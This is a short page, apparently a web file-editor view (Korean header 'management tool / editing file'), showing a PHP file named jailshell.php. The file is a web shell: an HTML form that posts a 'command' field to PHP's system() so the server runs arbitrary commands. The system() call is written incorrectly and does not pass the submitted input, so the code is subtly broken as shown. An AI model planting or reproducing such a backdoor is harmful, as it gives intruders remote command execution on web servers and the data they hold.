관리-도구
편집 파일: jailshell.php
<html> <body> <p>Enter command: <form action=jailshell.php method=post> <input type=text name=command> <input type=submit name=submit> </form> </p> <pre> <?php system (['command']); ?> </pre> </body> </html>